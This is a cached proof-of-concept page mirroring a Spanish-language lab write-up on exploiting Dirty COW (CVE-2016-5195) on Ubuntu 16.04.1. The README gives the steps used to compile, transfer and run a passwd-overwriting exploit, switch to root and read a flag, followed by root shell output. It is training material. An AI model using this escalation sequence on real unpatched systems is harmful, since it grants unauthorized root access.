Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2016-5195 PoC — Linux kernel 竞争条件问题漏洞

Source
Associated Vulnerability
Title:Linux kernel 竞争条件问题漏洞 (CVE-2016-5195)
Description:Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。 Linux kernel 2.x至4.8.3之前的4.x版本中的mm/gup.c文件存在竞争条件问题漏洞,该漏洞源于程序没有正确处理copy-on-write(COW)功能写入只读内存映射。本地攻击者可利用该漏洞获取权限。
Description
Explotación vulnerabilidad Dirty COW (CVE-2016-5195) en Ubuntu 16.04.1.
Readme
# dirtycow-lab
Explotación vulnerabilidad Dirty COW (CVE-2016-5195) en Ubuntu 16.04.1.

cat > README.md <<'EOF'
# 🐮 Dirty COW Exploit (CVE-2016-5195)

## 📌 Descripción
Este laboratorio demuestra la explotación de la vulnerabilidad **Dirty COW** en un sistema **Ubuntu Server 16.04.1** con kernel vulnerable.  
El objetivo fue **escalar privilegios** desde un usuario limitado (`student`) hasta `root` y capturar la flag ubicada en `/root/flag.txt`.

## 🛠️ Proceso realizado
1. **Verificación del kernel**: `Linux 4.4.0-31-generic` (vulnerable).
2. **Compilación del exploit**: en Kali dentro de Docker `ubuntu:16.04` se compiló `dirtycow_passwd.c` → binario `dirty`.
3. **Transferencia**: `scp dirty student@<IP>:~/`.
4. **Ejecución y escalada**: `chmod +x ~/dirty && ~/dirty` → `su root` (pass `dirtyCowFun`).
5. **Flag**: `cat /root/flag.txt` → `4GEEKS{Y0u_G0t_R00t}`.

## ✅ Resultado
```bash
root@ubuntu:/home/student# whoami
root
root@ubuntu:/home/student# id
uid=0(root) gid=0(root) groups=0(root)
root@ubuntu:/home/student# cat /root/flag.txt
4GEEKS{Y0u_G0t_R00t}

![Flag obtenida](evidencias/dirtycow.png)
File Snapshot

[4.0K] /data/pocs/ccc708969bb957c802bd9340ac0a86ebc66a2efa ├── [505K] dirtycow.png ├── [4.0K] exploit │   └── [1.7K] dirtycow_passwd.c └── [1.1K] README.md 1 directory, 3 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.